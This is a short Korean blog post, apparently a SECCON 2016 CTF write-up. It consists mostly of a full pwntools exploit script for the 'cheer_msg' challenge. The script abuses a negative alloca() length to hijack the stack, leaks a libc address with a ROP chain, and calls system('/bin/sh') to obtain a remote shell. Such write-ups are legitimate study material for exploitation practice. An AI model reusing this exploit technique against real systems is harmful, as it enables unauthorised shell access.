SECCON 2016 cheer_msg

Games/CTF 2016.12.12 20:22

요약: alloca 에 음수줘서 stack 해꼬질함.

summary: negative index to alloca() and fuckup the stack.



from pwn import *

context.arch = 'i386' # i386 / arm


# recvuntil sendline, pack, recv, send

r = remote('cheermsg.pwn.seccon.jp', 30527)

#r = process(['./cheer_msg'])

raw_input('attach')

# start pwn.


print r.recvuntil('Message Length >> ')

r.sendline('-144')

print r.recvuntil('Name >> ')


# ROP start!

pr = 0x80487af

got = 0x804a00c

printf = 0x8048430

main = 0x80485ca

system = 0

binsh = 0


payload = ''

payload += pack(printf)

payload += pack(pr)

payload += pack(got)

payload += pack(main)

r.sendline(payload)


sleep(1)

leak = r.recv(8192)

print leak.encode('hex')

setbuf = int(leak.split(': \n')[1][:4][::-1].encode('hex'), 16)

print hex(setbuf)



raw_input('leak ok?')



system_offset = -0x27810    # server

#system_offset = -0x27800    # local

binsh_offset = +0xf8d2c     # server

#binsh_offset = +0xf9094     # local


# stage2.

#print r.recvuntil('Message Length >> ')

r.sendline('-144')

print r.recvuntil('Name >> ')


# ROP start!

system = setbuf + system_offset

binsh = setbuf + binsh_offset

payload = pack(system)

payload += pack(0)

payload += pack(binsh)

r.sendline(payload)


# get shell?

r.interactive()



저작자 표시
신고

'Games > CTF' 카테고리의 다른 글

SECCON 2016 cheer_msg  (0) 2016.12.12
SECCON 2016 checker  (0) 2016.12.12
SECCON 2016 logger  (0) 2016.12.11
SECCON 2016 jumper  (0) 2016.12.11
SECCON 2016 chat  (0) 2016.12.11
Tokyo Westerns MMA CTF 2016 interpreter  (0) 2016.09.05
Posted by daehee87

댓글을 달아 주세요



티스토리 툴바